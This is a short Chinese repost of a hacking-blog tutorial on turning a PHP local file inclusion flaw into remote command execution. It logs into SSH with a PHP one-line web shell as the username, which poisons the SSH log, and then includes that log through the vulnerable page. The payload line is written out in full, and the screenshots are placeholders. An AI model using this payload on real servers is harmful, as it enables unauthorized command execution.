转自http://www.ayhacker.net/ayblog/read.php?173 文章的总体思路就是: 使用 ssh '<pre><?echo system($_GET['cmd']); exit;?>'@10.10.11.33登入,然后会在ssh的登入日志里记录,再让存在包含漏洞php去包含错误日志文件来达到目的。 包含正常的日志文件 clip_image001 使用特定的一句话木马作为帐号登入,产生含有一句话的日志文件 clip_image002 再次包含日志文件 clip_image003 成功执行 clip_image004 不过这个方法可能不是很通用, 首先,日志文件路径是不特定的,根据管理员习惯 其次,如果日志文件很大的情况下,估计包含就不会成功了 from: http://lanmaster53.com/2011/05/local-file-inclusion-to-remote-command-execution-using-ssh/
源链接

Hacking more

...